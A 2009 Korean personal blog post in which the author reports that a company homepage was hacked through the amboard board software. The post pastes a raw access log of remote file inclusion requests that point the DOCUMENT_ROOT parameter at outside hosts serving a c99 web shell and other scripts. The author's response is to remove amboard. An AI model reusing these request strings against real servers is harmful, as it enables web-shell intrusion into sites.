마음의 안정을 찾기 위하여 - Server 해킹....
2401016
33
340
관리자새글쓰기
태그위치로그방명록
별일없다의 생각
dawnsea's me2day/2010
색상(RGB)코드 추출기(Color...
Connection Generator/2010
최승호PD, '4대강 거짓말 검...
Green Monkey**/2010
Syng의 생각
syng's me2DAY/2010
천재 작곡가 윤일상이 기획,...
엘븐킹's Digital Factory/2010
Server 해킹....
사는 이야기/주저리 주저리 | 2009/12/18 15:43
얼마전 회사 업무로 인해 장기간 사무실을 비워뒀었는데, 그 기간동안에 회사 홈페이지 서버 해킹이 이뤄졌다.

회사 홈페이지를 아는 사람이 운영하는 회사에 부탁해서 만들었는데, 그쪽에서 사용한 "amsolution"이 문제가 된듯하다.

해당 솔루션에 취약점이 있는지.. 뭐 실력이 딸려서 그런거 분석하려면 시간이 좀 걸리니 무시....


78.170.44.201 - - [18/Dec/2009:09:06:34 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 119
78.170.44.201 - - [18/Dec/2009:09:06:34 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 199
78.170.44.201 - - [18/Dec/2009:09:06:57 +0900] "POST /ams/amboard/////?_SERVER[DOCUMENT_ROOT]=http://myshellcode.com/c99.txt? HTTP/1.1" 200 6469
78.170.44.201 - - [18/Dec/2009:09:07:07 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 119
78.170.44.201 - - [18/Dec/2009:09:07:07 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 199
78.170.44.201 - - [18/Dec/2009:09:07:19 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 200
78.170.44.201 - - [18/Dec/2009:09:07:21 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 250
78.170.44.201 - - [18/Dec/2009:09:07:29 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=buffer HTTP/1.1" 200 163
78.170.44.201 - - [18/Dec/2009:09:07:30 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 85
78.170.44.201 - - [18/Dec/2009:09:07:38 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=ext_lnk HTTP/1.1" 200 572
78.170.44.201 - - [18/Dec/2009:09:07:41 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=ext_diz HTTP/1.1" 200 1027
78.170.44.201 - - [18/Dec/2009:09:07:47 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=small_dir HTTP/1.1" 200 164
78.170.44.201 - - [18/Dec/2009:09:07:49 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=ext_php HTTP/1.1" 200 79
78.170.44.201 - - [18/Dec/2009:09:07:54 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=change HTTP/1.1" 200 290
78.170.44.201 - - [18/Dec/2009:09:08:00 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=download HTTP/1.1" 200 161
78.170.44.201 - - [18/Dec/2009:09:08:07 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=arrow_ltr HTTP/1.1" 200 88
78.170.44.201 - - [18/Dec/2009:09:21:54 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=ls&d=%2Fhome%2Ftemp%2Fbonsys%2Fpublic_html%2F&sort=0a HTTP/1.1" 200 5430
78.170.44.201 - - [18/Dec/2009:09:22:21 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=ext_css HTTP/1.1" 200 134
78.170.44.201 - - [18/Dec/2009:09:22:21 +0900] "GET /ams/amboard/////?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fmyshellcode.com%2Fc99.txt%3F&act=img&img=ext_htm HTTP/1.1" 200 79
121.101.214.54 - - [18/Dec/2009:13:20:39 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lb1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:39 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/ranmx.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:40 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lb1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:40 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lb1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:41 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/ranmx.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:46 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/ranmx.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:46 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/ranmx.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:07 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/id1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:07 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/id1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:07 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:07 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////aprinter.xpp??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////aprinter.xpp??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:21:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:12 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/id1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:12 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/id1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:18 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:18 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:23 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////aprinter.xpp??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:23 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////aprinter.xpp??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:29 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:29 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:34 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:21:35 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:40 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:40 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:40 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:43 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:45 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:46 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:46 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:48 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:50 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:51 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:51 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:53 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:55 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:57 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:19:57 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:19:58 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lp1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:01 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:02 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:02 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:04 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:06 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:08 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:09 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:11 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:13 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:13 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:14 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/cbn1.txt??? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:16 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:18 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:18 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:19 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:21 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:24 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:24 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:24 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:26 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:29 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:29 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:29 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////sprinter.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:31 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:34 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:35 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
66.249.131.120 - - [18/Dec/2009:13:20:35 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://gfqatar.com////ashell.xpp? HTTP/1.1" 404 295
121.101.214.54 - - [18/Dec/2009:13:20:36 +0900] "GET /ams/amboard////?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/lb1.txt??? HTTP/1.1" 404 295

결론적으로는 amboard를 사용하는 부분을 전부 제거해버리고 나니, 회사 홈페이지가 바보가 되어버렸다. -_-;
내일부터 쉬엄쉬엄 생노가다 Html로 디자인만 유지하게 만들어놔야지 -_-; 별짓을 다하고 있다.. 정말 -_-;
2009/12/18 15:43 2009/12/18 15:43
Article tag list Go to top
View Comment 0
Trackback URL :: 이 글에는 트랙백을 보낼 수 없습니다
 
 
 
 
: [1] ... [328][329][330][331][332][333][334][335][336] ... [1323] :
«   2024/12   »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31        
전체 (1323)
출판 준비 (0)
My-Pro... (41)
사는 ... (933)
블로그... (22)
My Lib... (32)
게임 ... (23)
개발관... (3)
Smart ... (1)
Delphi (93)
C Builder (0)
Object... (0)
VC, MF... (10)
Window... (1)
Open API (3)
Visual... (0)
Java, JSP (2)
ASP.NET (0)
PHP (6)
Database (12)
리눅스 (29)
Windows (25)
Device... (1)
Embedded (1)
게임 ... (0)
Web Se... (2)
Web, S... (21)
잡다한... (7)
프로젝트 (0)
Personal (0)
대통령... (13)
Link (2)